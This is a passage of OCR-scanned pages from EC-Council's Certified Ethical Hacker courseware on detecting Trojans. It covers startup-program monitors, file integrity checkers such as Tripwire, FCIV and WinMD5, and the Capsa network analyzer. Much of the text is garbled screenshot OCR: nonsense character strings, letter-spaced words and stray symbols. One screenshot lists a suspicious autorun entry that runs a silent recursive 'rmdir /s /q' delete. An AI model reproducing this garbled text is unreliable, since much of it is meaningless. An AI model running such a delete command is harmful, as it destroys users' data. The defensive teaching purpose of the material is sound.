C\Program Files «36.Ad.a‫־׳‬ce: Parenal Control B_ GJ>rog1am Filet U361\M . anced Pa‫׳‬cnul Contf0l\B_ CAProgram Fie* (r36)\PC Dwen MeadOujrtcn' D‫״‬v . 'C:\Progfam Fi*t U96&\Auto‫־‬Tr*J.*»'dULw•' C:\Progr«m Etles (r96J\Ekom^ctT Password Recovery.. C:\Prog1am FS« u & '.EVfT.EMfT nctifie‫■« ״‬ * ‘CAPtogram f i n (4t*IPSO N P.c|«tor\lPSON US . C^Program Files (rt6)'.NewvScftware t\f eider Lodcsf C:VProq‫׳‬am Edet Tarfk'googlet . G\Program Files (x36'.GecfcT00*1'GT\Yh0tJcxe ' C:VP1cg>wn F4n Udbi^WmdoMi lA«\)<lnMn9 «n1n . 'C:\Ptogram f i n lack«VnSW OVProgram Files 6tW)\Tc<ftSmi*\Sn1 gll '>S^agic3_ C:\W1ndcM1 VncM<A1 v<n1 t2 n» UnHackMe Roeebt Check C\Wind0M 4Uy£t*mi?.cmd.M ‫׳‬q/c tmdf /t/q 'C CAW1n<Jows\Sy5Wow6AWmFl Imy e»

^ M a w S iB aB ■ Registry -User Run
Registry -Machine Run Rejpstry ‫ ־‬User Run Registry •Machine Run Reysfty ‫ ־‬User Run Reystry •Machine Run Re^tby ‫ ־‬Machine Run Rcgisoy User Run Retptby •Machine Run Re^ so ry Machi ne Run Ray *by -Utw Run Re^tby •Machine Run Startup AD Users Reiptby •Machin* Run Regiioy Machine Run-. Registry •User RunOnce Reysoy ‫ ־‬User Run

₪V e i
bd Vts ₪ Yd Elcomsoft Distributed Passwc EMET Notifiei (Enhanced Mit! EPSON USB Ditplsy VI M [EP'J bd Y C S (Folder Lock) 0 V ‫ ״‬Google Talk

b dv«
Rv ‫״‬
lid Yes

( 1 9 6 j ' , G o o g l r ' , G o o ^ i r

0V ‫״‬
I s d Ye
bd Ve: hd V« 0 Vn

Window* l ‫׳‬v« M«k»«nyar Snegh

5W m m

A d o b e R e s d e t a n d A c !0b a t M a n a g e r / 1.6.S.0/A d o b e R e a d e r a n d A c r o b a t M a n a g e r A d >

—ms—iia —2^2!—*2s!— laamuuhttp://codestuff.tripod, com
Copyright © by

EG-G*ancil. All

Rights Reserved. Reproduction is Strictly Prohibited.

r

S t a r t u p P r o g r a m s M o n i t o r i n g T o o l: S t a r t e r
S o u rc e : h t t p : / / c o d e s t u f f . t r i p o d . c o m

S t a r t e r a llo w s y o u t o v i e w a n d m a n a g e all t h e p r o g r a m s t h a t s t a r t a u t o m a t i c a l l y w h e n e v e r t h e o p e r a t i n g s y s te m is lo a d e d . It e n u m e r a t e s all t h e h i d d e n r e g i s t r y e n t r i e s , s t a r t u p f o l d e r s ' it e m s a n d s o m e o f t h e in i t i a li z a t i o n files, so t h a t t h e u s e r c o u ld choose to te m p o ra rily d is a b le s e le c te d e n tr ie s , e d i t t h e m , c r e a t e n e w , o r d e l e t e t h e m p e r m a n e n t l y . S t a r t e r can also list all t h e p ro c e s s e s r u n n i n g a n d w i t h a c h a n g e t o v i e w e x t e n d e d p ro c e s s ' i n f o r m a t i o n (such as used DLLs, m e m o r y usage, t h r e a d c o u n t , p r i o r i t i e s , etc.), a n d t o t e r m i n a t e s e le c te d pro ces s. It s u p p o r t s M i c r o s o f t W i n d o w s 9x, M e , NT, 2 0 0 0 , XP, 2 0 0 3 , a n d V ista . T h e r e a re no s p e c ific re q u ire m e n ts except one: r e g is t r y o p e ra tio n s on a W in d o w s - N T - b a s e d

o p e r a t i n g s y s te m m a y r e q u i r e sp e cia l access r ig h ts . As a ru le , m e m b e r s o f A d m i n i s t r a t o r s and P o w e r U sers g r o u p s h a v e n o t h i n g t o w o r r y a b o u t .

M odule 06 Page 974

Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 C ertified Ethical Hacker

f5
File I Edit Configuration a Nev. 9 Hdp

Starter (Server 4.0)

‫־‬H

j

I Exit ‫ט‬
- 4 StJrtupl Sections ^ -

a
Edit

a
Delete Name * ( 3 11 APC PI (3 0 0
B

cl Refresh

a
Launch

3
Properties

1

‫ג־‬ Optiom

About

Piocrssn \ 4 b Swvkci

SB 6 3

B S

a

B

B ^

Afl lections (18) Startup folders (1) ^ Current user J tt All users (1) £ * Default user Registry (17) & Current user (7) 3 Run ($) 3 RunOnce (1) S i All users (10) 3 Run (9) 3 RunOnce 3 RunOnceE... 3 RunSetvices 3 RunServKe... S 4 Default user 3 Run 3 RunOnce INI files Wm.1m

V a lu e !E s a z a E E

S e c tio n

O e ta vta m
Yes Yes & Yes Yes Yes (Back Process) (Back Process)

*k Driver Detective
dtn.exe ElcomSoft DPR S.g EMET Notrfief i* EPSON UD START
6 FLBdckup

0 <^> googletilk 0 0 il (3 [ 3 (B (3 0 0 (3 B GTWhois msnmsgr m5.exe Soagrt lO.Ink svcnet2 Title Uninstall C:\User... WmfLTray

C:\Program Files (*86)\Advanced Parental Controf\B~ C:\Pr09 rem Frfes (186)\Advanced Parental ControfB... C:\Program Files («96)\PC Drivers HeadQuarters\Dnv... "C:\Program Files (x86)\Auto-Tracker\dtn.exe" C:\Program Files (»86)\Ekomsoft Password Recovery... C:\Program Files (*86)\EMET\EM6T_notrf1er.exe "C:\Program Files (*86)\EPSON Projector EPSON US— C:\Program Files (*86)\New$oftware $\F0Wer Lock\F... C:\Program Files (*86)\ Google\ Google Talc\googlet... C:\Program Files (*86)\GeekTools\GTWho*s.ece "C:\Program Files (x86)\Windows Lrve\Messenger\m... "C:\Program Files (x86)\ActrveTracker\m5.exe* C:\Program Files (x86)\TechSm*h\Snagft 10 »Snag1t 3 ...

cza e
Registry • User Run Registry ■Machine Run Registry •User Run Registry • Machine Run Registry - User Run Registry - Machine Run Registry • Machine Run Registry • Uset Run Registry ‫ ־‬Machine Run Registry - Machine Run Registry • Uset Run Registry ■Machine Run Startup All Users Registry ‫ ־‬Machine Run (k 9 «t‫׳‬y - Machine Run... Registry ■User RunOnce Registry ‫ ־‬User Run

‫ ׳י‬fm
Yes

Elcomsoft Distributed Passwc EMET Notifier (Enhanced M it EPSON US8 Display VI.40 (EP‫־‬

‫ ' י‬Yes (Folder Lock) 13 Yes Google Talk
Yes Yes Yes Yes < «a < fm Yes Yes

1
Soagit

1

j•

C:\Windows\svcnet2Vsvcnet2.exe UnHackMe Rootkit Check C:\W1ndows\systemiAcmd .exe /q /c rmdw /* /q "G ~ C:\W1ndows\SysWow64' WmFLTray.exe

Tray ApplKation (Folder Lock

3

Adobe Reader and Acrobat Manager / 1.6.5.0 / Adobe Reader and Acrobat Manager / Adobe Systems Incorporated

FIGURE 6.60: Starter Tool Screenshot

M odule 06 Page 975

Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 C ertified Ethical Hacker

Startup Programs Monitoring Tool: Security AutoRun
S e c u r ity A u to R u n d is p la y s t h e

U r t r f t e t f (lh K j| N « Im

ClEH
_

list of all applications that are loaded automatically when Windows starts up

1 ■ r j 4 -— ‫י־‬

S e c u rityA u to r u n ;W IN M S S E lC K 4 K 4 1 / A c 1 m 1 n 1 s tr a to r ]

-I" « o o

N
-

S t a r t u p P r o g r a m s M o n i t o r i n g T o o l: S e c u r i t y A u t o R u n
S o u rc e : h t t p : / / t c p m o n i t o r . a l t e r v i s t a . o r g

S e c u r ity A u t o R u n a llo w s y o u t o v i e w t h e lis t o f all a p p l i c a t i o n s t h a t a re lo a d e d a u t o m a t i c a l l y w h e n W i n d o w s s t a r t s u p . Each a p p li c a t i o n is lis te d w i t h t h e d e ta ils o f its t y p e , re g is try ,

c o m m o n / u s e r , services, d r iv e r s list, c o m m a n d - l i n e s tr in g , p r o d u c t n a m e , f ile v e r s io n , c o m p a n y n a m e , l o c a t io n in t h e r e g is t r y o r file s y s te m , a n d m o r e . It id e n t if ie s a s p y w a r e o r a d w a r e p ro g ra m th a t runs at s ta rtu p . C o m p a t i b le o p e ra tin g s y s te m s of W in d o w s are

9 x /M E /N T /2 0 0 0 /X P /V is ta /7 .

M odule 06 Page 976

Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 C ertified Ethical Hacker

Security Autonvt - [WIN MSStlC K4K4 VAdmmistMtor]

ls

is m m

o o 4A C u r c rtU M r

¥ **»)

¥ ‫כי*»כ‬0
^ ft

^* » / ‫י‬O x*(I) ¥• a lO M
* IMdfttf*

#1Md n w 1 | t t «T xocu/Mm^ui | 0 • «C U /O n M o » j # MuafftrtroB CU1 j v MoOu'i I 1 _i Sdw A*tfT*a I ‘ t n M« # t W I < L r 6 T * B B 0 n 1 x | f >O **‫* | ׳‬j *HM /SifiOaCi _ Sart«(M rvat>-(n|| 0 I M | A **Own 1 # mwtmOmm I # 1im /»^otnct(1) | V HtM S*r*ctN ««* C y rtrx * * .* X N Y ‫״‬ ‫׳‬f*T S *0* V & ^0 * ‫־‬ c tx rr •« W $ fcM0 »*rt0 rrV » * b S 4 T M C N
*ppk*S0w l*t«r i U M i i« r « a
Nrtwertt lr«w«neQnr p

5 sun*fcM r) (l)

* * ca j/* rO x »< i)

V O x •C O ) ¥ ^rOnab
V ^ r S « ^ (« C h »
* ?aloes

¥

»0

* Sh««Ct»»Kt(0

C :^ ftn d a w »y»g c< o ^ J< T yfw m B rtc t< V < ^ 3 0 )l» , W » •• c:V r*g r« »Nn{■ «) * w « r* o ryP Q O to rrv trv C : N *t (■ a t)<ArtPo p o t« « < C tfito d o w fto tfe n ttV fc o tt*■ *^ ocw »*{03 D 4 S P :.. C :W *6 »««‫־‬ * rt* > 1 U fc v * 0 tt.C ■ *4***gx C :W n d o w e )m »e «M W w vc-w c:fro g r« nN « «(> M )C P S O N P r o ^ K to rC P iO NU S 80 ‫»י‬ C V r t » X 1 * ‫ ׳‬$ yt1‫־‬ V0»^4‫׳‬y/W/ Vi f r « » V■*

:

^ w itvipSrM on

49 m io g an ¥ wgon Q S t* r u > W 0 «r 3) r/Q aC U l S iC U U M 3) App|r«0 lU
g *Opt"*

♦ ‫ ׳‬instato) Components

c

w

4 Q>Mrl«
4 4

JP Nryca(SS

C:tM r4^*4aW l*rtrram m «64vX0**F'rt«• ‫^ ז‬ ‫־‬ < 7‫•״‬ M h(* • 6 :600* U x)•* « .. t f-o^inHn (0 6 !C oc^U *te t»£ o o *«jp d • *♦ C :» w n d » w e 7 W lM geit.r*•

O> N tr

X:ft9l*NN(1M)yMl%«nraS4r1<(t^
C 'A r« M « » rt« ^ « U yw r> K f> * /If

^T a *S < *a d Ja r ♦ ‫ל‬ ‫־‬ . Start*

N r«n *t*So r
Mcrwoft 0* 0 * Owgnotacs $«*0 ‫•יוי‬ O«o» Sasc*tngrw

> tt*o(0)

^ t t i k A n (} )

O W o tS o frw ft P mkjp*

P O Q O W fc t
B< V ) *•mt

W tfp rw W vm

P e r< e n w 10 »C e x m r0 Uh*«

X* > 0 7 * •H" WCo~*>n 9w4\.. X fo g r‫ !״‬Nn (* ♦ 6 )< 0‫ייייי‬0 ‫״‬ ‫י‬Nutate* 9 w »d ’ , X:1 ^0 yw ■ N e tC o m ie nN » e f4 0 e e e ^$ h s n d v y * c v Hn (»M :r«ttU p «Y M «*•**4 **«’ X:*o*•‫״‬ • H"0*9V*W 1M i w ^ f O Q O K i o y f O Q C '‫׳‬A W 'iS o • •

C :Wr^eiwWDW<nWwr>r -»«W»«.SQLw» C p r tS • *W V ' t f r v n #

3

H K tY.lO C Al.M A CM tjr SYS

FIGURE 6.61: Security AutoRun Tool Screenshot

M odule 06 Page 977

Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 C ertified Ethical Hacker

Startup Programs Monitoring Tools
Absolute Startup manager
h ttp ://w w w . absolutestartup. com

C EH

Program Starter
http ://w w w .a b-tools.com

©

ActiveStartup
http ://w w w . hexilesoft. com

Disable Startup
h ttp ://w w w . disables tart up. com

StartEd Lite
http ://w w w .o u tertech .com t a t

StartupMonitor
h ttp ://w w w .m lin.net

Startup Inspector
h ttp ://w w w . w indowss tartup.com

Chameleon Startup Manager
http://w w w .cham eleon-m anagers.com

Autoruns for Windows
h ttp://technet.m icrosoft.com

1 1 1

Startup Booster
h ttp ://w w w .sm artpctoo ls. com

Copyright © by

EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.

S ta rtu p P r o g r a m s M o n ito r in g T o o ls
A list o f S t a r tu p p r o g r a m s ‫ ׳‬m o n i t o r i n g t o o l s a re as f o l lo w s : 0 0 0 0 0 0 0 0 0 0 A b s o l u t e S t a r tu p m a n a g e r a v a ila b le a t h t t p : / / w w w . a b s o l u t e s t a r t u p . c o m A c t iv e S t a r t u p a v a ila b le a t h t t p : / / w w w . h e x i l e s o f t . c o m S ta rtE d Lite a v a ila b le a t h t t p : / / w w w . o u t e r t e c h . c o m S t a r t u p In s p e c t o r a v a ila b le a t h t t p : / / w w w . w i n d o w s s t a r t u p . c o m A u t o r u n s f o r W i n d o w s a v a ila b le a t h t t p : / / t e c h n e t . m i c r o s o f t . c o m P r o g r a m S t a r t e r a v a ila b le a t h t t p : / / w w w . a b - t o o l s . c o m D isab le S t a r tu p a v a ila b le a t h t t p : / / w w w . d i s a b l e s t a r t u p . c o m S t a r t u p M o n i t o r a v a ila b le a t h t t p : / / w w w . m l i n . n e t C h a m e le o n S t a r t u p M a n a g e r a v a ila b le a t h t t p : / / w w w . c h a m e l e o n - m a n a g e r s . c o m S t a r t u p B o o s t e r a v a ila b le a t h t t p : / / w w w . s m a r t p c t o o l s . c o m

M odule 06 Page 978

Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 C ertified Ethical Hacker

Scanning for Suspicious Files and Folders

CEH

Trojans normally modify system's files and folders. Use these tools to detect system changes

FCIV
I t is a c o m m a n d lin e u t il it y t h a t c o m p u te s M D 5 o r S H A 1 c r y p to g r a p h ic h a s h e s f o r file s

TRIPWIRE
I t is a n e n t e r p r is e c la s s s y s te m in t e g r it y v e r if ie r t h a t s c a n s a n d r e p o r ts c r it ic a l s y s te m f ile s f o r changes

SIGVERIF
I t c h e c k s in t e g r it y o f c r it ic a l file s t h a t h a v e b e e n d ig it a lly s ig n e d b y M ic r o s o f t

C :\ CIV>fciv\.exe c:\hash .txt / / File Checksum In te g rity V e rifier version 2.05.

//
6 b lfb 2 f7 6 c l3 9 c 8 2 2 5 3 7 3 2 e lc 8 8 2 4 c c 2

‫־‬tripwire.

C:\hash.txt

Copyright © by

EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited.

S c a n n in g fo r S u s p ic io u s F ile s a n d F o ld e r s U s u a lly w h e n a s y s te m g e ts i n f e c t e d b y a T r o ja n , it m o d if ie s t h e file s a n d f o l d e r s ; y o u can scan t h e file s a n d f o l d e r s w i t h t h e f o l l o w i n g t o o l s in o r d e r t o d e t e c t t h e T r o j a n s in s t a l l e d .

^

F C IV v Fi l e C h e c k s u m I n t e g r i t y V e r i f i e r (FCIV) is a u t i l i t y t h a t can a ll o w y o u t o g e n e r a t e M D 5

o r S H A -1 hash v a lu e s f o r file s t h a t can b e v e r i f i e d w i t h t h e s ta n d a r d v a lu e s t o d e t e r m i n e a n y c h a n g e in t h e m ; i f f o u n d , y o u can ru n a v e r i f i c a t i o n o f t h e file s y s te m file s a g a in s t t h e X M L d a ta b a s e t o d e t e r m i n e w h i c h file s h a v e b e e n m o d if ie d . It is a c o m m a n d - p r o m p t u t i l i t y t h a t c o m p u t e s a n d v e r ifie s c r y p t o g r a p h i c hash v a lu e s o f all y o u r c r itic a l file s a n d saves t h e v a lu e s in an X M L file d a ta b a s e .

C:\ CIV>fciv\.exe c:\hash.txt // File Checksum Integrity Verifier version 2.05.
//

6blfb2f76cl39c82253732elc8824cc2 c :\hash.txt
T r ip w ir e — ©©‫־‬ S o u rc e : h t t p : / / w w w . t r i p w i r e . c o m

M odule 06 Page 979

Ethical Hacking and C ounterm easures Copyright © by EC-COUIICil All Rights Reserved. Reproduction is S trictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 C ertified Ethical Hacker

T rip w ire

E n te r p r is e

p r o v id e s e n tire

th e

c o n fig u ra tio n

c o n tro l

c a p a b ilit ie s

o rg a n iz a tio n s in te rn a l

need

to

p ro a c tiv e ly secure th e

i n f r a s t r u c t u r e a n d e n s u r e c o m p li a n c e w i t h

p o licie s,

r e g u la tio n s , a n d i n d u s t r y s t a n d a r d s a n d b e n c h m a r k s . “ S IG V E R IF S o u rc e : h t t p : / / b o o k s . g o o g l e . c o . i n SIGVERIF is a s ig n a t u r e v e r i f i c a t i o n t o o l t h a t a llo w s y o u t o f i n d sig n e d a n d u n s i g n e d d r i v e r s c o n n e c t e d t o t h e s y s te m . W h e n y o u f i n d a n y u n s ig n e d d r iv e r , y o u can m o v e t h a t t o a n e w f o l d e r a n d r e s t a r t t h e s y s te m a n d t e s t t h e p r o g r a m a nd f u n c t i o n a l i t y f o r e rr o r s . T h e f o l l o w i n g a re t h e s te p s t o i d e n t i f y u n s ig n e d d riv e r s : Q 9 e 9 Click S t a r t, click R un, t y p e SIGVERIF, a n d t h e n clic k Click t h e A d v a n c e d b u t t o n . Click t h e o t h e r file s t h a t a re n o t d ig i t a l l y s ig n e d . N a v ig a te t o w i n n t \ s y s t e m 3 2 \ d r i v e r s f o l d e r a n d t h e n c lick OK. u n s ig n e d d r iv e r s a n d lists a re d is p la y e d o n t h e OK.

A f t e r SIGVERIF fin is h e s , it ch e cks all t h e

c o m p u t e r . T h e i n v e s t i g a t o r can fin d t h e list o f all s ig n e d a n d u n s ig n e d d r iv e r s f o u n d b y SIGVERIF in

sigverif.txt in t h e %windir% f o l d e r , t y p i c a l l y t h e w i n n t o r w i n d o w s f o l d e r .

M odule 06 Page 980

Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 C ertified Ethical Hacker

Files and Folder Integrity Checker: FastSum and W i n M D 5
W1nMD5 V 2.07 (Cl 2003-2006 by eolsonS'mitedu - I‫ ! ם‬x

http://www.blisstonia.com
J W in M D 5 is a W in d o w s u tilit y f o r c o m p u tin g th e M D 5 h ash es ( " fin g e r p r in ts " ) o f file s J These fin g e rp rin ts can be used to e n s u re th a t th e f ile is u n c o rr u p te d

http://www.fastsum.com
-1 F a stS u m is u s e d f o r c h e c k in g in t e g r i t y o f t h e file s -J I t c o m p u te s c h e c k s u m s a c c o r d in g t o t h e M D 5 c h e c k s u m a lg o r it h m

Copyright © by

EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited.

j F ile s a n d F o ld e r I n t e g r it y C h e c k e r : F a s tS u m a n d W in M D 5

A file s a n d f o l d e r i n t e g r i t y c h e c k e r a llo w s y o u t o m o n i t o r t h e i n t e g r i t y o f fi l e s and f o l d e r s a n d c h e c k f o r a n y c h a n g e s in t h e c r itic a l file s, i n d i c a t i n g p o t e n t i a l i n t r u s io n a t t e m p t s . T h e s e w o r k w i t h a s u it e o f s e c u r it y t o o l s t o p r o v id e a c o m p l e t e a u d i t a n d m o n i t o r i n g s o lu t i o n f o r OSS a n d G u a r d ia n file s y s te m s . F a s tS u m S o u rc e : h t t p : / / w w w . f a s t s u m . c o m FastSum is b u i l t o n t h e w e l l - p r o v e n M D 5 c h e c k s u m a l g o r i t h m , w h i c h is used w o r l d w i d e f o r c h e c k in g t h e i n t e g r i t y o f t h e file s. You can ta k e c o n t r o l o f y o u r d a ta w i t h F astSum . F i n g e r p r i n t y o u r i m p o r t a n t file s n o w a n d c h e c k t h e i n t e g r i t y a f t e r a n e t w o r k t r a n s f e r o r a CD b u r n i n g s i m p l y b y t a k i n g t h e f i n g e r p r i n t s aga in a n d c o m p a r i n g t h e m w i t h t h e p r e v io u s ly m a d e o n e s . In t h e s a m e w a y , y o u can a lso fin d o u t w h e t h e r y o u r file s h ad b e e n d a m a g e d b y v iru s e s , n e t w o r k issues, o r C D / D V D b u r n i n g f a i lu r e s .

M odule 06 Page 981

Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 C ertified Ethical Hacker

FattSum 1.7 IUnr«g>?t«f*dl

t■ * !(•» ft*

O m

X ►* Ti
O m iiN lla vffivttiliM vyiuM irttsvriiictaaiw a d

*«*K » j»‫׳‬ *rfV‫׳‬r*JHy « c
D D n cW 'e 'JfjT ' r.f*h«
* ®‫ נ‬c * * jd fc 4 ) E U >/* > r w v iw V “ 1 - ‫־■— ־־־‬ * » Pca#11pr®

et*ta

n« tr of‫•זיז *•ץ‬

P m t * £•** C m * 5‫ ׳‬w i r » ■w

9

' " f•‫־‬ !

So. Chpcxm^vfM■ « N I r.0 *U ~ *£ 1 » ^ D U«B D W H f 5 K W 4 ( ‫ ־‬C J 4 r « W « « 5 1^5 •® W 3 ’w c c € f f w ‫ו‬ 7. « ‫ מ י א‬4^ ‫ ן ז ו‬5‫ מ י ל מ מ « נ ד ז‬0>?‫ס‬1€« JBM 1 3 t3 L fU 4 tU :tlW M i2 n t2 rtM 4 4 *a 2KB 4ACaaefSlS35CS£2t37SX1«Bltft6l7 >4 •t F4J! h: E iT fl [1:>3i

P

on

1‫— ?*• ד ע‬ # ] deeeopn {? f*M* j \

«« ‫י א לי‬ ‫•ו ג ד‬ A MS Ml

C3I24 U 5iA885tA2»U«2X 1W H6* 2C W «^M EFfv!rEA«7??nR B273 U y V U 4 D U 4 .1 M M M lS « e C « U 54AS647711J7A4271Mf &Cto££E 7X& 44ji^E tfX »M 0E *juC C £*]14!1tai 5HCttOFMf DK&6E4D7562t3£X6? ?K1»*aCPClKWfiC5«CMEFE7«ll

‫ו‬

SMptrM
C*a«Ml fro c«MK mI*1 0* • ‫״*י‬/VXII? 64‫♦מ‬ P H
D **C «nQ »* 7 ! * * * ‫ ?־ז‬Up* ‫ וו תי‬10*‫יי׳יי‬ W * • I * ‫ ל‬W «P

IM

j

A

c D M iM M i * 1aar,J0»714 9p n Pracw ii 2 2 H « a nO ta o a r v% # 3 1 *‫■ו‬ ■ n1 1 5 6 & £ ‫א‬ ‫מ‬o c0 0w«pr e c € 00« Bi«r

:UfcUrtr^ ♦» dwkMM

FIGURE 6 .6 2 : FastSum W in M D 5 S o u rc e : h t t p : / / w w w . b l i s s t o n i a . c o m W i n M D 5 v 2 .0 is a W i n d o w s (98, 2 0 0 0 , XP, V is ta , 7) u t i l i t y f o r c o m p u t i n g t h e M D 5 h a s h e s ( " f i n g e r p r i n t s " ) o f files. It also m a k e s it v e r y easy t o c o m p a r e t h e f i n g e r p r i n t s a g a in s t t h e c o r r e c t f i n g e r p r i n t s s t o r e d in an M D 5 S U M file . R e d H a t, f o r e x a m p le , p r o v id e s M D 5 S U M file s f o r all o f its la rg e d o w n lo a d a b le file s. T he se f i n g e r p r i n t s can be u sed to e n s u re t h a t y o u r f ile is

u n c o rru p te d .
WinMD5 v2.07 (C) 2003-2006 by eolson@mit.edu
File Edit O ptions Help

Currently Processing: (idle) (0 items enqueued)

Errors Found

Path MD5SUM.md5 ChangeLog.txt CorruptFile.txt README.txt WinMD5.exe

| Hash aeca3c951ddeal830ebe7cebab5de8cc d73ff397a76f886e8c5a80b05223feel 63895264778b3ce92c57d0dff670f7c7 e3d78080bfc49d89113c55cf4b7c4fb4 191c7c02a3206fdca2b79941c634d2b2

| Bytes 192 1304 92 978 126976

| Status Loaded Good BAD Good Good

Clear

Abort

Number of known md5 hashes found in MD5SUM files:

4

Drag files and MD5SUM files (if available) into this window.http ■ !;v.v.v.‫׳‬.bl 1sston 1a cony'software

FIGURE 6 .6 3 : W in M D 5

M odule 06 Page 982

Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 C ertified Ethical Hacker

Files and Folder Integrity Checker
Advanced Checksum Verifier (ACSV)
h ttp:/'/w w w . irnis. net

CEH

Attribute Manager
http ://w w w .m iklso ft.co m

ji
y

Fsum Fronted
h ttp://fsum fe.sou rceforge.net

PA File Sight
h ttp ://w w w .p ow erad m in. com

J
i p

Verisys
h ttp ://w w w . ionx. co. uk

CSP File Integrity Checker
h ttp ://w w w . tandem security. com

2


AFICK (Another File Integrity Checker)
h ttp ://afick.sourceforge.net

ExactFile
http ://w w w .exactfile.co m

I
‫יי‬

File Integrity Monitoring
h ttp ://w w w . ncircle.com ^n₪ 1|

OSSEC
h ttp ://w w w .o sse c.n e t

Copyright © by

EG-G*ancil. All

Rights Reserved. Reproduction Is Strictly Prohibited.

F ile s a n d F o ld e r I n t e g r it y C h e c k e r s Files a n d F o ld e r I n t e g r it y C h e c k e r s m o n i t o r file i n t e g r i t y a n d i d e n t i f y t h e c h a n g e s in

t h e c r itic a l file s t h a t i n t i m a t e a n y p o t e n t i a l i n t r u s i o n a t t e m p t s A f e w file s a n d f o l d e r i n t e g r i t y c h e c k e rs a re lis te d as f o l lo w s : © 0 0 0 0 © © 0 0 0 A d v a n c e d C h e c k s u m V e r i f i e r (ACSV) a v a ila b le a t h t t p : / / w w w . i r n i s . n e t Fsum F r o n te d a v a ila b le a t h t t p : / / f s u m f e . s o u r c e f o r g e . n e t V e ris y s a v a ila b le a t h t t p : / / w w w . i o n x . c o . u k AFICK ( A n o t h e r File I n t e g r it y C h e c k e r) a v a ila b le a t h t t p : / / a f i c k . s o u r c e f o r g e . n e t File I n t e g r i t y M o n i t o r i n g a v a ila b le a t h t t p : / / w w w . n c i r c l e . c o m A t t r i b u t e M a n a g e r a v a ila b le a t h t t p : / / w w w . m i k l s o f t . c o m PA File S ig h t a v a ila b le a t h t t p : / / w w w . p o w e r a d m i n . c o m CSP File I n t e g r it y C h e c k e r a v a ila b le a t h t t p : / / w w w . t a n d e m s e c u r i t y . c o m ExactFile a v a ila b le a t h t t p : / / w w w . e x a c t f i l e . c o m OSSEC a v a ila b le a t h t t p : / / w w w . o s s e c . n e t

M odule 06 Page 983

Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 C ertified Ethical Hacker

Scanning for Suspicious Network Activities
J

C EH

Trojans connect back to handlers and send confidential inform ation to attackers

J

Use n etw ork scanners and packet sniffers to m onitor n e tw o rk tra ffic going to m alicious rem ote addresses

J

Run tools such as Capsa to m onitor n etw ork traffic and look for suspicious activities sent o ver th e w eb

Copyright © by

EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.

S c a n n in g fo r S u s p ic io u s N e t w o r k A c t iv itie s A f t e r a m a l i c io u s a t t a c k , t h e T ro ja n s s t a r t s e n d in g t h e c o n f i d e n t i a l d a t a p r e s e n t o n th e s y s te m t o t h e a tta c k e r s . T ro ja n s c o n n e c t b a c k t o h a n d le r s a n d se n d c o n f i d e n t i a l i n f o r m a t i o n t o a tta c k e r s . Use n e t w o r k s c a n n e r s a n d p a c k e t s n if f e r s t o m o n i t o r n e t w o r k t r a f f i c g o in g t o

m a lic io u s r e m o t e a d d re s s e s . In o r d e r t o a v o id th e s e s i t u a t i o n s , it's a lw a y s b e t t e r t o scan t h e n e t w o r k s f o r s u s p ic io u s a c tiv it ie s . W i t h t h e h e lp o f s c a n n in g u t i l i t i e s , y o u can k n o w if t h e d a ta is b e in g t r a n s f e r r e d t o a m a lic io u s r e m o t e s o u rc e . By u sin g n e t w o r k s c a n n in g t o o l s like Capsa, y o u can i d e n t i f y such a c tiv itie s .

M odule 06 Page 984

Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 C ertified Ethical Hacker

Detecting Trojans and W o r m s with Capsa Network Analyzer

CEH

Capsa is an intuitive network analyzer, which provides detailed information to help check if there are any Trojan activities on a network

http ://w w w . colasoft. com

Copyright © by EC-Coancil. All Rights Reserved. Reproduction Is Strictly Prohibited.

J D e te c tin g T ro ja n s a n d W o r m s w ith S o u rc e : h t t p : / / w w w . c o l a s o f t . c o m Capsa is a n e t w o r k a n a ly z e r t h a t p r o v id e s e n o u g h i n f o r m a t i o n t o h e lp c h e c k if t h e r e is a n y T r o j a n a c t i v i t y o n a n e t w o r k . It is a p o r t a b l e n e t w o r k a n a ly z e r f o r LANs/WLANs t h a t p e r f o r m s p a c k e t c a p t u r in g , n e t w o r k m o n i t o r i n g , a d v a n c e d p r o t o c o l analysis, i n - d e p t h p a c k e t d e c o d in g , a n d a u t o m a t i c e x p e r t d ia g n o s is . F e a tu r e s o f Capsa N e t w o r k A n a l y z e r in c l u d e : © R e a l- tim e c a p t u r e and save d a ta t r a n s m i t t e d o v e r local n e tw o rks, i n c lu d in g w i r e d C a p s a N e tw o rk A n a ly z e r

